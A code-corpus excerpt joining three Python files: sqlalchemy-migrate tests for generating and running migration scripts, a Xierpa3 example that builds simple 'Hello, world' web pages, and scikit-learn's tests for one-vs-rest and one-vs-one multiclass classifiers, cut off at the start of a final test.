self.assertTrue("['User'].create()" in source_script)
self.assertTrue("['User'].drop()" in source_script)
@fixture.usedb()
def test_make_update_script_for_equal_models(self):
"""Try to make update script from two identical models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source + self.model_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertFalse('User.create()' in source_script)
self.assertFalse('User.drop()' in source_script)
@fixture.usedb()
def test_make_update_script_direction(self):
"""Check update scripts go in the right direction"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue(0
< source_script.find('upgrade')
< source_script.find("['User'].create()")
< source_script.find('downgrade')
< source_script.find("['User'].drop()"))
def setup_model_params(self):
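        # Shared fixture for the update-script tests: temp paths, model sources, a repository and a script.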
self.script_path = self.tmp_py()
self.repo_path = self.tmp()
self.first_model_path = os.path.join(self.temp_usable_dir, 'testmodel_first.py')
self.second_model_path = os.path.join(self.temp_usable_dir, 'testmodel_second.py')
self.base_source = """from sqlalchemy import *\nmeta = MetaData()\n"""
self.model_source = """
User = Table('User', meta,
Column('id', Integer, primary_key=True),
Column('login', Unicode(40)),
Column('passwd', String(40)),
)"""
self.repo = repository.Repository.create(self.repo_path, 'repo')
self.pyscript = PythonScript.create(self.script_path)
sys.modules.pop('testmodel_first', None)
sys.modules.pop('testmodel_second', None)
def write_file(self, path, contents):
f = open(path, 'w')
f.write(contents)
f.close()
class TestSqlScript(fixture.Pathed, fixture.DB):
@fixture.usedb()
def test_error(self):
"""Test if exception is raised on wrong script source"""
src = self.tmp()
f = open(src, 'w')
f.write("""foobar""")
f.close()
sqls = SqlScript(src)
self.assertRaises(Exception, sqls.run, self.engine)
@fixture.usedb()
def test_success(self):
"""Test sucessful SQL execution"""
# cleanup and prepare python script
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
# populate python script
contents = open(script_path, 'r').read()
contents = contents.replace("pass", "tmp_sql_table.create(migrate_engine)")
contents = 'from migrate.tests.fixture.models import tmp_sql_table\n' + contents
f = open(script_path, 'w')
f.write(contents)
f.close()
# write SQL script from python script preview
pyscript = PythonScript(script_path)
src = self.tmp()
f = open(src, 'w')
f.write(pyscript.preview_sql(self.url, 1))
f.close()
# run the change
sqls = SqlScript(src)
sqls.run(self.engine)
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
@fixture.usedb()
def test_transaction_management_statements(self):
"""
Test that we can successfully execute SQL scripts with transaction
management statements.
"""
for script_pattern in (
"BEGIN TRANSACTION; %s; COMMIT;",
"BEGIN; %s; END TRANSACTION;",
"/* comment */BEGIN TRANSACTION; %s; /* comment */COMMIT;",
"/* comment */ BEGIN TRANSACTION; %s; /* comment */ COMMIT;",
"""
-- comment
BEGIN TRANSACTION;
%s;
-- comment
COMMIT;""",
):
test_statement = ("CREATE TABLE TEST1 (field1 int); "
"DROP TABLE TEST1")
script = script_pattern % test_statement
src = self.tmp()
with open(src, 'wt') as f:
f.write(script)
sqls = SqlScript(src)
sqls.run(self.engine)
| mit | 2,017,535,593,245,108,500 | 32.842623 | 92 | 0.608894 | false |
petrvanblokland/Xierpa3 | xierpa3/sites/examples/helloworldpages/make.py | 1 | 8420 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
import webbrowser
from xierpa3.components import Theme, Page, Column
from xierpa3.builders.cssbuilder import CssBuilder
from xierpa3.builders.htmlbuilder import HtmlBuilder
from xierpa3.attributes import Em, Margin, Color, Perc
BODYFAMILY = 'Georgia, serif'
class BaseHelloWorldText(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
u"""Build a content base class. Inherited by specific HelloWorld... classes
that define the method **self.helloWorldText(b). In this example the CSS parameter
are still defined inside the block. Different from the real usage of BluePrint API parameter,
that allow modification from including components or inheriting components."""
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width='70%', maxwidth=700, minwidth=300, backgroundcolor='#222',
padding=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(4), textalign=self.C.CENTER,
lineheight=Em(1.4))
self._helloWorldText(b)
b._div()
b.div(class_=self.C.CLASS_CAPTION, color=Color('#888'),
margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(70), maxwidth=700, minwidth=300,
paddingleft=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(0.8),
textalign=self.C.CENTER, lineheight=Em(1.4), fontstyle=self.C.ITALIC)
b.text('Intentionally non-responsive page example. Generated by Xierpa3.')
b._div()
class HelloWorldHome(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('yellow')) # Color name will be translate to more reliable hex code.
b.text('Hello, world!')
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
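        # populate the shared AJAX dict with this component's data, keyed by class name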
myD = d['HelloWorldHome'] = {}
myD['name'] = 'Petr'
myD['message'] = 'Hello'
myD['fontName'] = site.e.form['font'] or 'notdefined'
return d
class HelloWorldOther1(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FF00')) # Show the text on this page in another color, to visualize the difference.
# TODO: Needs to clean up. JSON example goes to separate example site.
b.a(href='/ajax/font-MyFont')
b.text('Hello, world on another page using MyFont')
b._a()
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldOther1'] = {}
myD['message'] = 'Hello ' * 10
return d
class HelloWorldOther2(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FFFF')) # Show the text on this page in another color, to visualize the difference.
b.text('And yet another world on this page.')
b._div()
class Navigation(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(40), maxwidth=700, minwidth=300, backgroundcolor=Color('#DDD'),
padding=Em(0.5), fontfamily=BODYFAMILY, textalign=self.C.CENTER)
# Still doing content and page identifiers directly, without adapter, in this example.
b.text(' | ')
for pageId in HelloWorldPages.PAGES:
# Making a reference to the page class is enough to build the url.
b.a(href='/'+pageId, fontsize=Em(1), color=Color('#444'))
b.text(pageId.capitalize()) # Make simple label in the menu from page id..
b._a()
b.text(' | ')
b._div()
class HelloWorldPages(Theme):
u"""The **HelloWorldLayout** class implements a basic "Hello, world!" page, running as
batch process, saving the result as an HTML file. Also it is available in the example webserver,
e.g. through the Xierpa3App."""
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Theme.C
TITLE = u'The layout version of "Hello, world!" page.' # Use as title of window.
TEMPLATE_OTHER1 = 'other'
TEMPLATE_OTHER2 = 'otherworld'
PAGES = (C.TEMPLATE_INDEX, TEMPLATE_OTHER1, TEMPLATE_OTHER2)
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of the text component to be placed on the page.
navigation = Navigation()
home = HelloWorldHome() # Example text component for the home page.
other1 = HelloWorldOther1() # Example text component for the other1Page
other2 = HelloWorldOther2() # Example text component for the other2Page
# Create an instance (=object) of the page, containing the "hw" component.
# The class is also the page name in the url. The navigation simply refers
        # to the url by class name.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(navigation, home),
title=self.TITLE + '|' + self.C.TEMPLATE_INDEX)
other1Page = Page(class_=self.TEMPLATE_OTHER1, components=(navigation, other1),
title=self.TITLE + '|' + self.TEMPLATE_OTHER1)
other2Page = Page(class_=self.TEMPLATE_OTHER2, components=(navigation, other2),
title=self.TITLE + '|' + self.TEMPLATE_OTHER2)
# Answer a list of types of pages for this site.
return [homePage, other1Page, other2Page]
def make(self, root=None):
u"""The instance of this class builds CSS and HTML files at the optional path **root**.
If not defined, then the default ~/Desktop/Xierpa3Examples/[component.name] is used as export path,
as set by Builder.DEFAULT_ROOTPATH"""
# Create an "instance" (=object) of type "HelloWorldLayout". The type (=class) defines
# the behavior of the object that is made by calling the class.
# C S S
# Create the main CSS builder instance to build the SASS/CSS part of the site.
cssBuilder = CssBuilder()
# Compile (=build) the SCSS to CSS and save the file in "css/style.css".
self.build(cssBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
cssBuilder.save(self, root)
# H T M L
# Create the main HTML builder instance to build the HTML part of the site.
htmlBuilder = HtmlBuilder()
# Compile the HTML and save the resulting HTML file in "helloWorld.html".
self.build(htmlBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
# Answer the path, so we can directly open the file with a browser.
return htmlBuilder.save(self, root)
if __name__ == '__main__':
# TODO: Why is the browser loading the CSS for every page?
# This construction "__name__ == '__main__'" makes this Python file only
# be executed when called in direct mode, such as "python make.py" in the terminal.
    # Since no rootPath is added to make(), the file export is in ~/Desktop/Xierpa3Examples/HelloWorldPages/
path = HelloWorldPages().make()
webbrowser.open(path)
| mit | -3,560,916,106,662,295,000 | 49.722892 | 116 | 0.644656 | false |
anntzer/scikit-learn | sklearn/tests/test_multiclass.py | 5 | 32749 | import numpy as np
import scipy.sparse as sp
import pytest
from re import escape
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.utils._mocking import CheckingClassifier
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import (check_classification_targets,
type_of_target)
from sklearn.utils import (
check_array,
shuffle,
)
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression,
SGDClassifier)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.impute import SimpleImputer
from sklearn import svm
from sklearn.exceptions import NotFittedError
from sklearn import datasets
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# test predicting without fitting
with pytest.raises(NotFittedError):
ovr.predict([])
# Fail on multioutput data
msg = "Multioutput target data is not supported with label binarization"
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1, 2], [3, 1]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1.5, 2.4], [3.1, 0.8]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
def test_check_classification_targets():
# Test that check_classification_target return correct type. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
with pytest.raises(ValueError, match=msg):
check_classification_targets(y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) > 0.65
def test_ovr_partial_fit():
# Test if partial_fit is working as intended
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert len(ovr.estimators_) == len(np.unique(y))
assert np.mean(y == pred) > 0.65
    # Test when mini-batches don't have all classes
    # with SGDClassifier
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
ovr.partial_fit(X[:7], y[:7], np.unique(y))
ovr.partial_fit(X[7:], y[7:])
pred = ovr.predict(X)
ovr1 = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
pred1 = ovr1.fit(X, y).predict(X)
assert np.mean(pred == y) == np.mean(pred1 == y)
# test partial_fit only exists if estimator has it:
ovr = OneVsRestClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovr_partial_fit_exceptions():
ovr = OneVsRestClassifier(MultinomialNB())
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr.partial_fit(X[:7], y[:7], np.unique(y))
# If a new class that was not in the first call of partial fit is seen
# it should raise ValueError
y1 = [5] + y[7:-1]
msg = r"Mini-batch contains \[.+\] while classes must be subset of \[.+\]"
with pytest.raises(ValueError, match=msg):
ovr.partial_fit(X=X[7:], y=y1)
def test_ovr_ovo_regressor():
    # test that ovr and ovo work on regressors which don't have a
    # decision_function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes * (n_classes - 1) / 2
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert clf.multilabel_
assert sp.issparse(Y_pred_sprs)
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf = svm.SVC()
clf_sprs = OneVsRestClassifier(clf).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
    # Note: this tests the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
# As list of lists, it would be: [[int(i >= 5), 2, 3] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label .+ is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert np.unique(y_pred[:, -2:]) == 1
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label not 1 is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
if hasattr(base_clf, 'decision_function'):
dec = clf.decision_function(X)
assert dec.shape == (5,)
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert 2 == len(probabilities[0])
assert (clf.classes_[np.argmax(probabilities, axis=1)] ==
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert y_pred == 1
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert clf.multilabel_
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert len(ovr.estimators_) == 3
assert ovr.score(iris.data, iris.target) > .9
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert clf.multilabel_
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
assert not hasattr(decision_only, 'predict_proba')
decision_only.fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
assert hasattr(decision_only, 'decision_function')
# Estimator which can get predict_proba enabled after fitting
gs = GridSearchCV(svm.SVC(probability=False),
param_grid={'probability': [True]})
proba_after_fit = OneVsRestClassifier(gs)
assert not hasattr(proba_after_fit, 'predict_proba')
proba_after_fit.fit(X_train, Y_train)
assert hasattr(proba_after_fit, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
    # predict assigns the label with the greatest
    # predictive probability.
pred = Y_proba.argmax(axis=1)
assert not (pred - Y_pred).any()
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0),
LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert shape[0] == n_classes
assert shape[1] == iris.data.shape[1]
# don't densify sparse coefficients
assert (sp.issparse(ovr.estimators_[0].coef_) ==
sp.issparse(ovr.coef_))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovr.coef_
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
msg = "Base estimator doesn't have a coef_ attribute"
with pytest.raises(AttributeError, match=msg):
ovr.coef_
# TODO: Remove this test in version 1.1 when
# the coef_ and intercept_ attributes are removed
def test_ovr_deprecated_coef_intercept():
ovr = OneVsRestClassifier(SVC(kernel="linear"))
ovr = ovr.fit(iris.data, iris.target)
msg = (r"Attribute {0} was deprecated in version 0.24 "
r"and will be removed in 1.1 \(renaming of 0.26\). If you observe "
r"this warning while using RFE or SelectFromModel, "
r"use the importance_getter parameter instead.")
for att in ["coef_", "intercept_"]:
with pytest.warns(FutureWarning, match=msg.format(att)):
getattr(ovr, att)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovo.predict([])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
def test_ovo_partial_fit_predict():
temp = datasets.load_iris()
X, y = temp.data, temp.target
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert len(ovo1.estimators_) == n_classes * (n_classes - 1) / 2
assert np.mean(y == pred1) > 0.65
assert_almost_equal(pred1, pred2)
# Test when mini-batches have binary target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:60], y[:60], np.unique(y))
ovo1.partial_fit(X[60:], y[60:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred1, pred2)
assert len(ovo1.estimators_) == len(np.unique(y))
assert np.mean(y == pred1) > 0.65
ovo = OneVsOneClassifier(MultinomialNB())
X = np.random.rand(14, 2)
y = [1, 1, 2, 3, 3, 0, 0, 4, 4, 4, 4, 4, 2, 2]
ovo.partial_fit(X[:7], y[:7], [0, 1, 2, 3, 4])
ovo.partial_fit(X[7:], y[7:])
pred = ovo.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
    # raises error when the mini-batch contains classes not in all_classes
ovo = OneVsOneClassifier(MultinomialNB())
error_y = [0, 1, 2, 3, 4, 5, 2]
message_re = escape("Mini-batch contains {0} while "
"it must be subset of {1}".format(np.unique(error_y),
np.unique(y)))
with pytest.raises(ValueError, match=message_re):
ovo.partial_fit(X[:7], error_y, np.unique(y))
# test partial_fit only exists if estimator has it:
ovr = OneVsOneClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
# first binary
ovo_clf.fit(iris.data, iris.target == 0)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples,)
# then multi-class
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples, n_classes)
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
        # For each sample and each class, there are only 3 possible vote levels
        # because there are only 3 distinct class pairs and thus 3 distinct
        # binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert set(votes[:, class_idx]).issubset(set([0., 1., 2.]))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert len(np.unique(decisions[:, class_idx])) > 146
def test_ovo_gridsearch():
